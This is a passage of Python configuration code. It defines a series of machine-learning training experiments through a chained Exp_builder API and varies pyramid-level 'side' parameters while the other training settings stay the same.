ch032_1side_7__2side_2__3side_2_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_2__3side_2_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s2__3s2__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_2__3side_2_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_3__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_3__3side_1_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s3__3s1__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_3__3side_1_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_3__3side_2_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_3__3side_2_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s3__3s2__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_3__3side_2_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_3__3side_2_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_3__3side_2_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s3__3s2__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_3__3side_2_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_3__3side_3_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_3__3side_3_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s3__3s3__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_3__3side_3_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_3__3side_3_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_3__3side_3_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s3__3s3__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_3__3side_3_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_3__3side_3_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_3__3side_3_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s3__3s3__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_3__3side_3_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_4__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_4__3side_1_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s4__3s1__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_4__3side_1_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_4__3side_2_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_4__3side_2_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s4__3s2__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_4__3side_2_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_4__3side_2_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_4__3side_2_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s4__3s2__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_4__3side_2_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_4__3side_3_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_4__3side_3_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s4__3s3__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_4__3side_3_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_4__3side_3_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_4__3side_3_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s4__3s3__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_4__3side_3_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_4__3side_3_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_4__3side_3_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s4__3s3__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_4__3side_3_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_4__3side_4_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_4__3side_4_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s4__3s4__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_4__3side_4_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_4__3side_4_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_4__3side_4_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s4__3s4__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_4__3side_4_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_4__3side_4_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_4__3side_4_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s4__3s4__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_4__3side_4_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_4__3side_4_4side_4 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_4__3side_4_4side_4_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s4__3s4__4s4") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_4__3side_4_4side_4, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_5__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_5__3side_1_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s5__3s1__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_5__3side_1_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_5__3side_2_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_5__3side_2_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s5__3s2__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_5__3side_2_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_5__3side_2_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_5__3side_2_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s5__3s2__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_5__3side_2_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_5__3side_3_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_5__3side_3_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s5__3s3__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_5__3side_3_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_5__3side_3_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_5__3side_3_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s5__3s3__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_5__3side_3_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_5__3side_3_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_5__3side_3_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s5__3s3__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_5__3side_3_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_5__3side_4_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_5__3side_4_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s5__3s4__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_5__3side_4_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_5__3side_4_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_5__3side_4_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s5__3s4__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_5__3side_4_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_5__3side_4_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_5__3side_4_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s5__3s4__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_5__3side_4_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_5__3side_4_4side_4 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_5__3side_4_4side_4_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s5__3s4__4s4") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_5__3side_4_4side_4, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_5__3side_5_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_5__3side_5_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s5__3s5__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_5__3side_5_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_5__3side_5_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_5__3side_5_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s5__3s5__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_5__3side_5_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_5__3side_5_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_5__3side_5_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s5__3s5__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_5__3side_5_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_5__3side_5_4side_4 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_5__3side_5_4side_4_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s5__3s5__4s4") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_5__3side_5_4side_4, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_5__3side_5_4side_5 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_5__3side_5_4side_5_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s5__3s5__4s5") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_5__3side_5_4side_5, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_6__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_6__3side_1_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s6__3s1__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_6__3side_1_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_6__3side_2_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_6__3side_2_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s6__3s2__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_6__3side_2_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_6__3side_2_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_6__3side_2_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s6__3s2__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_6__3side_2_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_6__3side_3_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_6__3side_3_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s6__3s3__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_6__3side_3_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_6__3side_3_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_6__3side_3_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s6__3s3__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_6__3side_3_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_6__3side_3_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_6__3side_3_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s6__3s3__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_6__3side_3_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_6__3side_4_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_6__3side_4_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s6__3s4__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_6__3side_4_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
